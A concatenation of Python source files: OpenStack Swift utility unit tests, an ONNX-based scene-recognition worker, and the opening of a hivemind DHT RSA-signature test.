}, 'pfx')
self.assertStat('pfx.some.counter:1|c|@0.93', self.logger.increment,
'some.counter')
self.assertStat('pfx.some.counter:-1|c|@0.93', self.logger.decrement,
'some.counter')
self.assertStat('pfx.some.operation:4760.0|ms|@0.93',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.93',
self.logger.timing_since, 'another.op',
time.time())
self.assertStat('pfx.another.counter:3|c|@0.93',
self.logger.update_stats, 'another.counter', 3)
# Each call can override the sample_rate
self.assertStat('pfx.some.counter:1|c|@0.9912', self.logger.increment,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.counter:-1|c|@0.9912', self.logger.decrement,
'some.counter', sample_rate=0.9912)
self.assertStat('pfx.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('pfx\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('pfx.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
# Can override sample_rate with non-keyword arg
self.logger.set_statsd_prefix('')
self.assertStat('some.counter:1|c|@0.987654', self.logger.increment,
'some.counter', 0.987654)
self.assertStat('some.counter:-1|c|@0.987654', self.logger.decrement,
'some.counter', 0.987654)
self.assertStat('some.operation:4900.0|ms|@0.987654',
self.logger.timing, 'some.operation',
4.9 * 1000, 0.987654)
self.assertStatMatches('another\.op:\d+\.\d+\|ms|@0.987654',
self.logger.timing_since, 'another.op',
time.time(), 0.987654)
self.assertStat('another.counter:3|c|@0.987654',
self.logger.update_stats, 'another.counter',
3, 0.987654)
def test_delegate_methods_with_metric_prefix(self):
self.logger = utils.get_logger({
'log_statsd_host': 'localhost',
'log_statsd_port': str(self.port),
'log_statsd_metric_prefix': 'alpha.beta',
}, 'pfx')
self.assertStat('alpha.beta.pfx.some.counter:1|c',
self.logger.increment, 'some.counter')
self.assertStat('alpha.beta.pfx.some.counter:-1|c',
self.logger.decrement, 'some.counter')
self.assertStat('alpha.beta.pfx.some.operation:4760.0|ms',
self.logger.timing, 'some.operation', 4.76 * 1000)
self.assertStatMatches(
'alpha\.beta\.pfx\.another\.op:\d+\.\d+\|ms',
self.logger.timing_since, 'another.op', time.time())
self.assertStat('alpha.beta.pfx.another.counter:3|c',
self.logger.update_stats, 'another.counter', 3)
self.logger.set_statsd_prefix('')
self.assertStat('alpha.beta.some.counter:1|c|@0.9912',
self.logger.increment, 'some.counter',
sample_rate=0.9912)
self.assertStat('alpha.beta.some.counter:-1|c|@0.9912',
self.logger.decrement, 'some.counter', 0.9912)
self.assertStat('alpha.beta.some.operation:4900.0|ms|@0.9912',
self.logger.timing, 'some.operation', 4.9 * 1000,
sample_rate=0.9912)
self.assertStatMatches('alpha\.beta\.another\.op:\d+\.\d+\|ms|@0.9912',
self.logger.timing_since, 'another.op',
time.time(), sample_rate=0.9912)
self.assertStat('alpha.beta.another.counter:3|c|@0.9912',
self.logger.update_stats, 'another.counter', 3,
sample_rate=0.9912)
def test_get_valid_utf8_str(self):
unicode_sample = u'\uc77c\uc601'
valid_utf8_str = unicode_sample.encode('utf-8')
invalid_utf8_str = unicode_sample.encode('utf-8')[::-1]
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(valid_utf8_str))
self.assertEqual(valid_utf8_str,
utils.get_valid_utf8_str(unicode_sample))
self.assertEqual(b'\xef\xbf\xbd\xef\xbf\xbd\xec\xbc\x9d\xef\xbf\xbd',
utils.get_valid_utf8_str(invalid_utf8_str))
@reset_logger_state
def test_thread_locals(self):
logger = utils.get_logger(None)
# test the setter
logger.thread_locals = ('id', 'ip')
self.assertEqual(logger.thread_locals, ('id', 'ip'))
# reset
logger.thread_locals = (None, None)
self.assertEqual(logger.thread_locals, (None, None))
logger.txn_id = '1234'
logger.client_ip = '1.2.3.4'
self.assertEqual(logger.thread_locals, ('1234', '1.2.3.4'))
logger.txn_id = '5678'
logger.client_ip = '5.6.7.8'
self.assertEqual(logger.thread_locals, ('5678', '5.6.7.8'))
def test_no_fdatasync(self):
called = []
class NoFdatasync(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.os', NoFdatasync()):
with patch('swift.common.utils.fsync', fsync):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_yes_fdatasync(self):
called = []
class YesFdatasync(object):
def fdatasync(self, fd):
called.append(fd)
with patch('swift.common.utils.os', YesFdatasync()):
utils.fdatasync(12345)
self.assertEqual(called, [12345])
def test_fsync_bad_fullsync(self):
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
raise IOError(18)
with patch('swift.common.utils.fcntl', FCNTL()):
self.assertRaises(OSError, lambda: utils.fsync(12345))
def test_fsync_f_fullsync(self):
called = []
class FCNTL(object):
F_FULLSYNC = 123
def fcntl(self, fd, op):
called[:] = [fd, op]
return 0
with patch('swift.common.utils.fcntl', FCNTL()):
utils.fsync(12345)
self.assertEqual(called, [12345, 123])
def test_fsync_no_fullsync(self):
called = []
class FCNTL(object):
pass
def fsync(fd):
called.append(fd)
with patch('swift.common.utils.fcntl', FCNTL()):
with patch('os.fsync', fsync):
utils.fsync(12345)
self.assertEqual(called, [12345])
class TestAuditLocationGenerator(unittest.TestCase):
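    # audit_location_generator walks temp trees laid out as
    # <root>/<drive>/<datadir>/<partition>/<suffix>/<hash>/<object file>;
    # these tests cover listdir failures, non-directory entries, mount checks
    # and filtering by object suffix.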
def test_drive_tree_access(self):
orig_listdir = utils.listdir
def _mock_utils_listdir(path):
if 'bad_part' in path:
raise OSError(errno.EACCES)
elif 'bad_suffix' in path:
raise OSError(errno.EACCES)
elif 'bad_hash' in path:
raise OSError(errno.EACCES)
else:
return orig_listdir(path)
# Check Raise on Bad partition
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
obj_path = os.path.join(data, "bad_part")
with open(obj_path, "w"):
pass
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Suffix
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
part2 = os.path.join(data, "partition2")
os.makedirs(part2)
obj_path = os.path.join(part1, "bad_suffix")
with open(obj_path, 'w'):
pass
suffix = os.path.join(part2, "suffix")
os.makedirs(suffix)
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
# Check Raise on Bad Hash
tmpdir = mkdtemp()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
part1 = os.path.join(data, "partition1")
os.makedirs(part1)
suffix = os.path.join(part1, "suffix")
os.makedirs(suffix)
hash1 = os.path.join(suffix, "hash1")
os.makedirs(hash1)
obj_path = os.path.join(suffix, "bad_hash")
with open(obj_path, 'w'):
pass
with patch('swift.common.utils.listdir', _mock_utils_listdir):
audit = lambda: list(utils.audit_location_generator(
tmpdir, "data", mount_check=False))
self.assertRaises(OSError, audit)
rmtree(tmpdir)
def test_non_dir_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
            # Create a file that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False
)
self.assertEqual(list(locations), [])
def test_mount_check_drive(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
            # Create a file that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True, logger=logger
)
self.assertEqual(list(locations), [])
self.assertEqual(2, len(logger.get_lines_for_level('warning')))
# Test without the logger
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=True
)
self.assertEqual(list(locations), [])
def test_non_dir_contents(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
with open(os.path.join(data, "partition1"), "w"):
pass
partition = os.path.join(data, "partition2")
os.makedirs(partition)
with open(os.path.join(partition, "suffix1"), "w"):
pass
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
with open(os.path.join(suffix, "hash1"), "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
self.assertEqual(list(locations), [])
def test_find_objects(self):
with temptree([]) as tmpdir:
expected_objs = list()
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
            # Create a file that represents a non-dir drive
open(os.path.join(tmpdir, 'asdf'), 'w')
partition = os.path.join(data, "partition1")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition1'))
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj2.db")
with open(obj_path, "w"):
pass
expected_objs.append((obj_path, 'drive', 'partition2'))
locations = utils.audit_location_generator(
tmpdir, "data", mount_check=False, logger=logger
)
got_objs = list(locations)
self.assertEqual(len(got_objs), len(expected_objs))
self.assertEqual(sorted(got_objs), sorted(expected_objs))
self.assertEqual(1, len(logger.get_lines_for_level('warning')))
def test_ignore_metadata(self):
with temptree([]) as tmpdir:
logger = FakeLogger()
data = os.path.join(tmpdir, "drive", "data")
os.makedirs(data)
partition = os.path.join(data, "partition2")
os.makedirs(partition)
suffix = os.path.join(partition, "suffix2")
os.makedirs(suffix)
hash_path = os.path.join(suffix, "hash2")
os.makedirs(hash_path)
obj_path = os.path.join(hash_path, "obj1.dat")
with open(obj_path, "w"):
pass
meta_path = os.path.join(hash_path, "obj1.meta")
with open(meta_path, "w"):
pass
locations = utils.audit_location_generator(
tmpdir, "data", ".dat", mount_check=False, logger=logger
)
self.assertEqual(list(locations),
[(obj_path, "drive", "partition2")])
class TestGreenAsyncPile(unittest.TestCase):
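    # GreenAsyncPile runs spawned callables on green threads and yields their
    # results as they complete; these tests cover completion order,
    # waitall/waitfirst timeouts and the internal _pending counter.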
def test_runs_everything(self):
def run_test():
tests_ran[0] += 1
return tests_ran[0]
tests_ran = [0]
pile = utils.GreenAsyncPile(3)
for x in range(3):
pile.spawn(run_test)
self.assertEqual(sorted(x for x in pile), [1, 2, 3])
def test_is_asynchronous(self):
def run_test(index):
events[index].wait()
return index
pile = utils.GreenAsyncPile(3)
for order in ((1, 2, 0), (0, 1, 2), (2, 1, 0), (0, 2, 1)):
events = [eventlet.event.Event(), eventlet.event.Event(),
eventlet.event.Event()]
for x in range(3):
pile.spawn(run_test, x)
for x in order:
events[x].send()
self.assertEqual(next(pile), x)
def test_next_when_empty(self):
def run_test():
pass
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test)
self.assertEqual(next(pile), None)
self.assertRaises(StopIteration, lambda: next(pile))
def test_waitall_timeout_timesout(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 1.0)
self.assertEqual(pile.waitall(0.5), [0.1])
self.assertEqual(completed[0], 1)
def test_waitall_timeout_completes(self):
def run_test(sleep_duration):
eventlet.sleep(sleep_duration)
completed[0] += 1
return sleep_duration
completed = [0]
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 0.1)
pile.spawn(run_test, 0.1)
self.assertEqual(pile.waitall(0.5), [0.1, 0.1])
self.assertEqual(completed[0], 2)
def test_waitfirst_only_returns_first(self):
def run_test(name):
eventlet.sleep(0)
completed.append(name)
return name
completed = []
pile = utils.GreenAsyncPile(3)
pile.spawn(run_test, 'first')
pile.spawn(run_test, 'second')
pile.spawn(run_test, 'third')
self.assertEqual(pile.waitfirst(0.5), completed[0])
# 3 still completed, but only the first was returned.
self.assertEqual(3, len(completed))
def test_wait_with_firstn(self):
def run_test(name):
eventlet.sleep(0)
completed.append(name)
return name
for first_n in [None] + list(range(6)):
completed = []
pile = utils.GreenAsyncPile(10)
for i in range(10):
pile.spawn(run_test, i)
actual = pile._wait(1, first_n)
expected_n = first_n if first_n else 10
self.assertEqual(completed[:expected_n], actual)
self.assertEqual(10, len(completed))
def test_pending(self):
pile = utils.GreenAsyncPile(3)
self.assertEqual(0, pile._pending)
for repeats in range(2):
            # repeat to verify that pending goes back up again after going down
for i in range(4):
pile.spawn(lambda: i)
self.assertEqual(4, pile._pending)
for i in range(3, -1, -1):
next(pile)
self.assertEqual(i, pile._pending)
# sanity check - the pile is empty
self.assertRaises(StopIteration, pile.next)
# pending remains 0
self.assertEqual(0, pile._pending)
class TestLRUCache(unittest.TestCase):
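    # utils.LRUCache is a memoizing decorator bounded by entry count (maxsize)
    # and/or age (maxtime); math.sqrt is patched out below to prove that hits
    # are served from the cache rather than recomputed.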
def test_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
_orig_math_sqrt = math.sqrt
# setup cache [0-10)
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# update cache [10-20)
for i in range(10, 20):
self.assertEqual(math.sqrt(i), f(i))
# cache size is fixed
self.assertEqual(f.size(), 10)
# validate cache [10-20)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
for i in range(10):
self.assertRaises(TypeError, f, i)
# cache unchanged
self.assertEqual(f.size(), 10)
with patch('math.sqrt'):
for i in range(10, 20):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
def test_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
_orig_math_sqrt = math.sqrt
now = time.time()
the_future = now + 31
# setup cache [0-10)
with patch('time.time', lambda: now):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate cache [0-10)
with patch('math.sqrt'):
for i in range(10):
self.assertEqual(_orig_math_sqrt(i), f(i))
self.assertEqual(f.size(), 10)
# validate expired [0-10)
with patch('math.sqrt', new=None):
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertRaises(TypeError, f, i)
# validate repopulates [0-10)
with patch('time.time', lambda: the_future):
for i in range(10):
self.assertEqual(math.sqrt(i), f(i))
# reuses cache space
self.assertEqual(f.size(), 10)
def test_set_maxtime(self):
@utils.LRUCache(maxtime=30)
def f(*args):
return math.sqrt(*args)
self.assertEqual(30, f.maxtime)
self.assertEqual(2, f(4))
self.assertEqual(1, f.size())
# expire everything
f.maxtime = -1
# validate un-cached [0-10)
with patch('math.sqrt', new=None):
self.assertRaises(TypeError, f, 4)
def test_set_maxsize(self):
@utils.LRUCache(maxsize=10)
def f(*args):
return math.sqrt(*args)
for i in range(12):
f(i)
self.assertEqual(f.size(), 10)
f.maxsize = 4
for i in range(12):
f(i)
self.assertEqual(f.size(), 4)
class TestParseContentRange(unittest.TestCase):
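    # parse_content_range parses a "bytes <start>-<end>/<total>" header value
    # into integers and raises ValueError for anything malformed.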
def test_good(self):
start, end, total = utils.parse_content_range("bytes 100-200/300")
self.assertEqual(start, 100)
self.assertEqual(end, 200)
self.assertEqual(total, 300)
def test_bad(self):
self.assertRaises(ValueError, utils.parse_content_range,
"100-300/500")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes 100-200/aardvark")
self.assertRaises(ValueError, utils.parse_content_range,
"bytes bulbous-bouffant/4994801")
class TestParseContentDisposition(unittest.TestCase):
def test_basic_content_type(self):
name, attrs = utils.parse_content_disposition('text/plain')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {})
def test_content_type_with_charset(self):
name, attrs = utils.parse_content_disposition(
'text/plain; charset=UTF8')
self.assertEqual(name, 'text/plain')
self.assertEqual(attrs, {'charset': 'UTF8'})
def test_content_disposition(self):
name, attrs = utils.parse_content_disposition(
'form-data; name="somefile"; filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
def test_content_disposition_without_white_space(self):
name, attrs = utils.parse_content_disposition(
'form-data;name="somefile";filename="test.html"')
self.assertEqual(name, 'form-data')
self.assertEqual(attrs, {'name': 'somefile', 'filename': 'test.html'})
class TestIterMultipartMimeDocuments(unittest.TestCase):
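    # iter_multipart_mime_documents yields a file-like object for each MIME part
    # delimited by the given boundary; the tests cover tiny and large reads,
    # readline behaviour, leading CRLFs and truncated input.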
def test_bad_start(self):
it = utils.iter_multipart_mime_documents(StringIO('blah'), 'unique')
exc = None
try:
next(it)
except MimeInvalid as err:
exc = err
self.assertTrue('invalid starting boundary' in str(exc))
self.assertTrue('--unique' in str(exc))
def test_empty(self):
it = utils.iter_multipart_mime_documents(StringIO('--unique'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), '')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_basic2(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abcdefg')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_tiny_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(2), 'ab')
self.assertEqual(fp.read(2), 'cd')
self.assertEqual(fp.read(2), 'ef')
self.assertEqual(fp.read(2), 'g')
self.assertEqual(fp.read(2), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_big_reads(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabcdefg\r\n--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_leading_crlfs(self):
it = utils.iter_multipart_mime_documents(
StringIO('\r\n\r\n\r\n--unique\r\nabcdefg\r\n'
'--unique\r\nhijkl\r\n--unique--'),
'unique')
fp = next(it)
self.assertEqual(fp.read(65536), 'abcdefg')
self.assertEqual(fp.read(), '')
fp = next(it)
self.assertEqual(fp.read(), 'hijkl')
        self.assertRaises(StopIteration, next, it)
def test_broken_mid_stream(self):
# We go ahead and accept whatever is sent instead of rejecting the
# whole request, in case the partial form is still useful.
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nabc'), 'unique')
fp = next(it)
self.assertEqual(fp.read(), 'abc')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n\r\n'
'jkl\r\n\r\n--unique--'), 'unique')
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
def test_readline_with_tiny_chunks(self):
it = utils.iter_multipart_mime_documents(
StringIO('--unique\r\nab\r\ncd\ref\ng\r\n--unique\r\nhi\r\n'
'\r\njkl\r\n\r\n--unique--'),
'unique',
read_chunk_size=2)
fp = next(it)
self.assertEqual(fp.readline(), 'ab\r\n')
self.assertEqual(fp.readline(), 'cd\ref\ng')
self.assertEqual(fp.readline(), '')
fp = next(it)
self.assertEqual(fp.readline(), 'hi\r\n')
self.assertEqual(fp.readline(), '\r\n')
self.assertEqual(fp.readline(), 'jkl\r\n')
exc = None
try:
next(it)
except StopIteration as err:
exc = err
self.assertTrue(exc is not None)
class TestParseMimeHeaders(unittest.TestCase):
def test_parse_mime_headers(self):
doc_file = BytesIO(b"""Content-Disposition: form-data; name="file_size"
Foo: Bar
NOT-title-cAsED: quux
Connexion: =?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=
Status: =?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=
Latin-1: Resincronizaci\xf3n realizada con \xe9xito
Utf-8: \xd0\xba\xd0\xbe\xd0\xbd\xd1\x82\xd0\xb5\xd0\xb9\xd0\xbd\xd0\xb5\xd1\x80
This is the body
""")
headers = utils.parse_mime_headers(doc_file)
utf8 = u'\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440'
if six.PY2:
utf8 = utf8.encode('utf-8')
expected_headers = {
'Content-Disposition': 'form-data; name="file_size"',
'Foo': "Bar",
'Not-Title-Cased': "quux",
# Encoded-word or non-ASCII values are treated just like any other
# bytestring (at least for now)
'Connexion': "=?iso8859-1?q?r=E9initialis=E9e_par_l=27homologue?=",
'Status': "=?utf-8?b?5byA5aeL6YCa6L+H5a+56LGh5aSN5Yi2?=",
'Latin-1': "Resincronizaci\xf3n realizada con \xe9xito",
'Utf-8': utf8,
}
self.assertEqual(expected_headers, headers)
self.assertEqual(b"This is the body\n", doc_file.read())
class FakeResponse(object):
def __init__(self, status, headers, body):
self.status = status
self.headers = HeaderKeyDict(headers)
self.body = StringIO(body)
def getheader(self, header_name):
return str(self.headers.get(header_name, ''))
def getheaders(self):
return self.headers.items()
def read(self, length=None):
return self.body.read(length)
def readline(self, length=None):
return self.body.readline(length)
class TestDocumentItersToHTTPResponseBody(unittest.TestCase):
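    # document_iters_to_http_response_body stitches per-range document iterators
    # into one response body, adding MIME boundaries plus per-part Content-Type
    # and Content-Range headers when multipart=True.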
def test_no_parts(self):
body = utils.document_iters_to_http_response_body(
iter([]), 'dontcare',
multipart=False, logger=FakeLogger())
self.assertEqual(body, '')
def test_single_part(self):
body = "time flies like an arrow; fruit flies like a banana"
doc_iters = [{'part_iter': iter(StringIO(body).read, '')}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'dontcare',
multipart=False, logger=FakeLogger()))
self.assertEqual(resp_body, body)
def test_multiple_parts(self):
part1 = "two peanuts were walking down a railroad track"
part2 = "and one was a salted. ... peanut."
doc_iters = [{
'start_byte': 88,
'end_byte': 133,
'content_type': 'application/peanut',
'entity_length': 1024,
'part_iter': iter(StringIO(part1).read, ''),
}, {
'start_byte': 500,
'end_byte': 532,
'content_type': 'application/salted',
'entity_length': 1024,
'part_iter': iter(StringIO(part2).read, ''),
}]
resp_body = ''.join(
utils.document_iters_to_http_response_body(
iter(doc_iters), 'boundaryboundary',
multipart=True, logger=FakeLogger()))
self.assertEqual(resp_body, (
"--boundaryboundary\r\n" +
# This is a little too strict; we don't actually care that the
# headers are in this order, but the test is much more legible
# this way.
"Content-Type: application/peanut\r\n" +
"Content-Range: bytes 88-133/1024\r\n" +
"\r\n" +
part1 + "\r\n" +
"--boundaryboundary\r\n"
"Content-Type: application/salted\r\n" +
"Content-Range: bytes 500-532/1024\r\n" +
"\r\n" +
part2 + "\r\n" +
"--boundaryboundary--"))
class TestPairs(unittest.TestCase):
def test_pairs(self):
items = [10, 20, 30, 40, 50, 60]
got_pairs = set(utils.pairs(items))
self.assertEqual(got_pairs,
set([(10, 20), (10, 30), (10, 40), (10, 50), (10, 60),
(20, 30), (20, 40), (20, 50), (20, 60),
(30, 40), (30, 50), (30, 60),
(40, 50), (40, 60),
(50, 60)]))
class TestSocketStringParser(unittest.TestCase):
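    # parse_socket_string splits a "host[:port]" string (including bracketed
    # IPv6 addresses) into host and port, falling back to the supplied default
    # port and raising ValueError for ambiguous input.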
def test_socket_string_parser(self):
default = 1337
addrs = [('1.2.3.4', '1.2.3.4', default),
('1.2.3.4:5000', '1.2.3.4', 5000),
('[dead:beef::1]', 'dead:beef::1', default),
('[dead:beef::1]:5000', 'dead:beef::1', 5000),
('example.com', 'example.com', default),
('example.com:5000', 'example.com', 5000),
('foo.1-2-3.bar.com:5000', 'foo.1-2-3.bar.com', 5000),
('1.2.3.4:10:20', None, None),
('dead:beef::1:5000', None, None)]
for addr, expected_host, expected_port in addrs:
if expected_host:
host, port = utils.parse_socket_string(addr, default)
self.assertEqual(expected_host, host)
self.assertEqual(expected_port, int(port))
else:
with self.assertRaises(ValueError):
utils.parse_socket_string(addr, default)
if __name__ == '__main__':
unittest.main()
|
scene.py
|
import _thread as thread
import ast
import io
import json
import os
import sqlite3
import sys
import time
import warnings
from multiprocessing import Process
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), "."))
from shared import SharedOptions
if SharedOptions.PROFILE == "windows_native":
sys.path.append(os.path.join(SharedOptions.APP_DIR,"windows_packages"))
import numpy as np
import onnxruntime as rt
import torch
import torch.nn.functional as F
from PIL import Image, UnidentifiedImageError
import traceback
import torchvision.transforms as transforms
class SceneModel(object):
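    # Thin wrapper around an ONNX Runtime session for the scene classifier;
    # predict() returns the argmax class index and the softmax confidence.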
def __init__(self, model_path, cuda=False):
self.sess = rt.InferenceSession(model_path)
self.input_name = self.sess.get_inputs()[0].name
def predict(self, image_tensors):
out = self.sess.run(None, {self.input_name: image_tensors})
out = np.array(out)
torch_out = torch.from_numpy(out).squeeze(1)
torch_out = torch.softmax(torch_out, 1)
return out.argmax(), torch_out.max().item()
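# Worker loop: poll the shared IMAGE_QUEUE ("scene_queue"), run each queued
# image through the Places365 classifier, and store the JSON result under the
# request id so the caller can retrieve it.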
def scenerecognition(thread_name, delay):
classes = list()
with open(
os.path.join(SharedOptions.SHARED_APP_DIR, "categories_places365.txt")
) as class_file:
for line in class_file:
classes.append(line.strip().split(" ")[0][3:])
placesnames = tuple(classes)
IMAGE_QUEUE = "scene_queue"
classifier = SceneModel(
os.path.join(SharedOptions.SHARED_APP_DIR, "scene.model"),
SharedOptions.CUDA_MODE,
)
while True:
queue = SharedOptions.db.lrange(IMAGE_QUEUE, 0, 0)
if len(queue) > 0:
SharedOptions.db.ltrim(IMAGE_QUEUE, len(queue), -1)
for req_data in queue:
req_data = json.JSONDecoder().decode(req_data)
img_id = req_data["imgid"]
req_id = req_data["reqid"]
req_type = req_data["reqtype"]
img_path = os.path.join(SharedOptions.TEMP_PATH,img_id)
try:
img = Image.open(img_path).convert("RGB")
trans = transforms.Compose(
[
transforms.Resize((256, 256)),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize(
[0.485, 0.456, 0.406], [0.229, 0.224, 0.225]
),
]
)
img = trans(img)
img = img.numpy()
img = np.expand_dims(img, 0).astype(np.float32)
os.remove(img_path)
cl, conf = classifier.predict(img)
cl = placesnames[cl]
conf = float(conf)
output = {"success": True, "label": cl, "confidence": conf}
                except UnidentifiedImageError:
                    err_trace = traceback.format_exc()
                    print(err_trace, file=sys.stderr, flush=True)
                    output = {"success": False, "error": "invalid image", "code": 400}
                except Exception:
                    err_trace = traceback.format_exc()
                    print(err_trace, file=sys.stderr, flush=True)
                    output = {
                        "success": False,
                        "error": "error occurred on the server",
                        "code": 500,
                    }
finally:
SharedOptions.db.set(req_id, json.dumps(output))
if os.path.exists(img_path):
os.remove(img_path)
time.sleep(delay)
if __name__ == "__main__":
p = Process(target=scenerecognition, args=("", SharedOptions.SLEEP_TIME))
p.start()
|
test_dht_crypto.py
|
import dataclasses
import multiprocessing as mp
import pickle
import pytest
import hivemind
from hivemind.dht.crypto import RSASignatureValidator
from hivemind.dht.node import DHTNode
from hivemind.dht.validation import DHTRecord
from hivemind.utils.crypto import RSAPrivateKey
from hivemind.utils.timed_storage import get_dht_time
def test_rsa_signature_validator():
receiver_validator = RSASignatureValidator()
sender_validator = RSASignatureValidator(RSAPrivateKey())
mallory_validator = RSASignatureValidator(RSAPrivateKey())
plain_record = DHTRecord(key=b"key", subkey=b"subkey", value=b"value", expiration_time=get_dht_time() + 10)
protected_records = [
dataclasses.replace(plain_record, key=plain_record.key + sender_validator.local_public_key),
dataclasses.replace(plain_record, subkey=plain_record.subkey + sender_validator.local_public_key),
]
# test 1: Non-protected record (no signature added)
assert sender_validator.sign_value(plain_record) == plain_record.value
